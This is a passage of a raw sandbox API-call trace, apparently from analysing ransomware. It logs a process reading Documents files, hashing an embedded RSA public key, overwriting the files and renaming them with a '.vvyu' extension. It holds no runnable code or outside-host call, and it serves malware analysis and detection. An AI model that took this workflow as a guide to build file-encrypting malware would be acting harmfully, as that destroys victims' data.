(HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0195.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a078 [0195.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0195.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0195.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0195.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a120 [0195.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0195.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a138 [0195.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0195.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0195.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0195.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0f0 [0195.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0195.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0c0 [0195.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0195.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a150 [0195.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0c0 | out: hHeap=0x6a0000) returned 1 [0195.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a0c0 [0195.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0f0 | out: hHeap=0x6a0000) returned 1 [0195.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0195.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0195.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0195.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0195.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27748 [0195.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a090 | out: hHeap=0x6a0000) returned 1 [0195.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a090 [0195.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0195.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0195.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0d8 | out: hHeap=0x6a0000) returned 1 [0195.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0195.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a150 | out: hHeap=0x6a0000) returned 1 [0195.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d3b678 [0195.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0195.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0ec50 [0195.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0195.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0195.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a090 | out: hHeap=0x6a0000) returned 1 [0195.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fc90 [0195.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0195.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c0d0a0 [0195.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0195.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea788 | out: hHeap=0x6a0000) returned 1 [0195.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0195.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0d0a0 | out: hHeap=0x6a0000) returned 1 [0195.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0195.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0195.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0195.166] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0195.166] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0195.166] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0195.166] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0c0 | out: hHeap=0x6a0000) returned 1 [0195.166] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0195.166] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a138 | out: hHeap=0x6a0000) returned 1 [0195.166] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0195.166] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a078 | out: hHeap=0x6a0000) returned 1 [0195.166] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a120 | out: hHeap=0x6a0000) returned 1 [0195.167] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0195.167] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0195.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0195.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0a8 | out: hHeap=0x6a0000) returned 1 [0195.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f168 | out: hHeap=0x6a0000) returned 1 [0195.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0195.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0195.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0195.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0195.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0195.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0195.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0195.170] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0195.170] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0195.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0195.171] WriteFile (in: hFile=0x52c, lpBuffer=0x2d49778*, nNumberOfBytesToWrite=0x14cb3, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d49778*, lpNumberOfBytesWritten=0x30ffb14*=0x14cb3, lpOverlapped=0x0) returned 1 [0195.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0195.172] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x14cb8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.173] WriteFile (in: hFile=0x52c, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0195.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0195.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0195.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0195.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0195.174] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0195.174] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0195.174] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0195.174] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.174] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.174] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0195.174] CloseHandle (hObject=0x52c) returned 1 [0195.177] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea788 [0195.177] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x880) returned 0x2d154b0 [0195.177] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea788 | out: hHeap=0x6a0000) returned 1 [0195.177] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\noOiZR\\TdPk.ots" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\uhfbjiac\\nooizr\\tdpk.ots"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\noOiZR\\TdPk.ots.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\uhfbjiac\\nooizr\\tdpk.ots.vvyu")) returned 1 [0195.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0195.180] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c2d920 | out: hHeap=0x6a0000) returned 1 [0195.183] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36a71c70, ftCreationTime.dwHighDateTime=0x1d89904, ftLastAccessTime.dwLowDateTime=0x8ea8b7e0, ftLastAccessTime.dwHighDateTime=0x1d89a07, ftLastWriteTime.dwLowDateTime=0x8ea8b7e0, ftLastWriteTime.dwHighDateTime=0x1d89a07, nFileSizeHigh=0x0, nFileSizeLow=0x8498, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VVjlRm5Wps_PeZL.odp", cAlternateFileName="VVJLRM~1.ODP")) returned 1 [0195.183] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0195.183] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa6) returned 0x2c2d920 [0195.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0195.183] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\noOiZR\\VVjlRm5Wps_PeZL.odp") returned=".odp" [0195.183] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\noOiZR\\VVjlRm5Wps_PeZL.odp" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\uhfbjiac\\nooizr\\vvjlrm5wps_pezl.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0195.184] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=33944) returned 1 [0195.184] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0195.186] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x8472, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.186] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0195.188] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0195.189] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0195.189] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.189] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x8498, lpOverlapped=0x0) returned 1 [0195.189] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.190] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0195.190] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.190] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.190] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea788) returned 1 [0195.191] CryptCreateHash (in: hProv=0x6ea788, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0195.191] CryptHashData (hHash=0x2cbf990, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.191] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0195.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0195.191] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0195.191] GetLastError () returned 0x0 [0195.191] CryptDestroyHash (hHash=0x2cbf990) returned 1 [0195.191] CryptReleaseContext (hProv=0x6ea788, dwFlags=0x0) returned 1 [0195.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0195.192] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0195.192] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0195.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0195.192] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0195.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0195.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0195.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x84a0) returned 0x2d49778 [0195.192] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0195.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0195.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0195.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0195.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f168 [0195.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0a8 [0195.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d425c8 [0195.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a120 [0195.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a078 [0195.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a138 [0195.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0c0 [0195.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0195.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0195.193] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0195.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0195.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a078 | out: hHeap=0x6a0000) returned 1 [0195.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0c0 | out: hHeap=0x6a0000) returned 1 [0195.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a138 | out: hHeap=0x6a0000) returned 1 [0195.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0195.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a138 [0195.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0195.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a0c0 [0195.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0195.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a078 [0195.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0195.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0195.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27748 [0195.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0195.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0195.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0195.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0195.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0195.195] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0195.195] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0c0 | out: hHeap=0x6a0000) returned 1 [0195.195] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0195.195] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a078 | out: hHeap=0x6a0000) returned 1 [0195.195] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0195.195] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0195.195] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a138 | out: hHeap=0x6a0000) returned 1 [0195.195] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0195.196] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0195.196] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0195.196] GetCurrentThreadId () returned 0x264 [0195.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0195.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d46900 [0195.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84b70 [0195.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea788 [0195.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0195.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0195.197] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0195.197] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0195.197] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.197] GetCurrentThreadId () returned 0x264 [0195.197] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.197] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0195.197] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 